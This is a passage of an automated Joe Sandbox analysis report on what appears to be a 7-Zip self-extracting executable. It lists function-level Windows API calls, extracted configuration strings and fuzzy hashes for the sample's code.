??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F

Strings

OverwriteMode, xrefs: 00405E4A
7-Zip SFX, xrefs: 00406D53
i386, xrefs: 004068D8
bpt, xrefs: 00405F7C
HelpText, xrefs: 00406279
forcenowait, xrefs: 00406829
waitall, xrefs: 00406742
SetEnvironment, xrefs: 004061A1, 004061A9, 0040623A
RunProgram, xrefs: 00406383, 0040649A, 004064A8
sfxelevation, xrefs: 004058BD, 0040606A
del, xrefs: 004068A1
shc, xrefs: 00406881
ExecuteFile, xrefs: 0040637E, 00406476, 00406484
nowait, xrefs: 00406805
x64, xrefs: 004068FE
Delete, xrefs: 00406C2C
BeginPrompt, xrefs: 0040638E
MiscFlags, xrefs: 00405ED4
setup.exe, xrefs: 004066C9, 004066CE, 00406729
FinishMessage, xrefs: 00406C73
GUIMode, xrefs: 00405E8E
hidcon, xrefs: 004067E7
InstallPath, xrefs: 004062FC
sfxversion, xrefs: 0040585C
ExecuteParameters, xrefs: 00406964
amd64, xrefs: 004068EB
GUIFlags, xrefs: 00405EB1
AutoInstall, xrefs: 004063F0, 0040644B, 004067B0
7zSfxString%d, xrefs: 00405D24
SelfDelete, xrefs: 00405F14, 00406CD9
sfxconfig, xrefs: 00405A8A, 00405C55
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 00406D58
sfxwaitall, xrefs: 004058A1
" -, xrefs: 0040606F
BeginPromptTimeout, xrefs: 00405F95, 00406325
x86, xrefs: 004068C5
7ZipSfx.%03x, xrefs: 0040656E
Shortcut, xrefs: 00406C04

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
API String ID: 1141480454-1804565692
Opcode ID: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
Opcode Fuzzy Hash: 70599bd1909c1660afbe8675f911dde0ba5a546dff0894423a23835351c4fce5
Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D

Function 00401815 Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
Opcode Fuzzy Hash: c73201a278f1b3fb0192b37316eaaccfca94a9c717224a51945d29c04819a4bf
Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

Function 0040236F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
GetProcAddress.KERNEL32(00000000), ref: 00402386
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

Strings

kernel32, xrefs: 0040237A
GetNativeSystemInfo, xrefs: 00402375

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AddressInfoLibraryLoadNativeProcSystem
String ID: GetNativeSystemInfo$kernel32
API String ID: 2103483237-3846845290
Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

Function 00403387 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
SetLastError.KERNEL32(00000010), ref: 004033AA

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D

Function 004011D1 Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011ED
SendMessageW.USER32(00008001,00000000,?), ref: 00401246

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction ID: 6bce3cc04fac88c0623c077a1f6ff58a39868f34b7b8d3af9ac8bc0393cf14a7
Opcode Fuzzy Hash: c4409eea25fa902e72ed841aea0622abf6309c0a7110b39fd0afdcd0313368d3
Instruction Fuzzy Hash: C5018B30220205FBEB10AF50EC89F9A37A8EB01300F1084BAF514F91E0DBB9AC408B1D

Function 00404F67 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00404F8B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
ShellExecuteExW.SHELL32(?), ref: 0040500A
WaitForSingleObject.KERNEL32(00406A69,000000FF), ref: 00405022
CloseHandle.KERNEL32(00406A69), ref: 0040502B
??3@YAXPAX@Z.MSVCRT(?), ref: 00405032

Strings

$gA, xrefs: 00404FBE

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
String ID: $gA
API String ID: 2700081640-3949116232
Opcode ID: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
Instruction ID: ed471f47135b1f40d8481ce0364afbd0fdc4c640c0e5737cceb289ed8d9b0336
Opcode Fuzzy Hash: af380bbf304387a9167cbd1d4d1862e6770bcacde50da9e8c22bf20be027a6a5
Instruction Fuzzy Hash: 0A218071C00249ABDF11EFD5D8459DEBBB8EF44318F10812BF915762A0DB785949CF58

Function 00401D21 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
DispatchMessageW.USER32(?), ref: 00401D73
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

Strings

Static, xrefs: 00401D44

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction ID: 383de423edee8b1f15e14e65255527aef4da18b75050025dbc481d2ec4aca0b1
Opcode Fuzzy Hash: 9176f2b3be156760845f27d0c503cf1f669651295b521d97bc39be25fea497be
Instruction Fuzzy Hash: 51F0F432542925BBDA2127659C4DFDF3E2CDFC6B72F104161F619E50D0DAB84041CAF9

Function 004036F1 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

memcpy.MSVCRT(-00000001,004017CF,?,?,?,?,?,004017CF,?), ref: 004037CC
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,004017CF,?), ref: 00403809
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,004017CF,004017CF,?,?,?,?,004017CF,?), ref: 0040384F

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
Opcode Fuzzy Hash: 56e83d9032eb4557e1cbfa7845c089d1cc7cb79c4288f6695d96d71fac981e1d
Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

Function 0040F227 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040F230
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1

Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E

Strings

{D@, xrefs: 0040F290, 0040F2A7
pmA, xrefs: 0040F2EB

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: pmA${D@
API String ID: 3431946709-901781089
Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

Function 00401B75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4

Strings

k7@, xrefs: 00401B78

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID: k7@
API String ID: 635176117-1561861239
Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

Function 0040E9EF Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4

Strings

{D@, xrefs: 0040ED6C, 0040EED8
DmA, xrefs: 0040EA31

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@
String ID: DmA${D@
API String ID: 1033339047-1777112864
Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-0
Opcode ID: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
Opcode Fuzzy Hash: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F

Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(024B4890,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(024B4890), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,024B4890,00000002), ref: 00402334

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
wsprintfW.USER32 ref: 004049B0

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Strings

7zSfxFolder%02d, xrefs: 004049AA

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d
API String ID: 3387708999-2820892521
Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676

Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
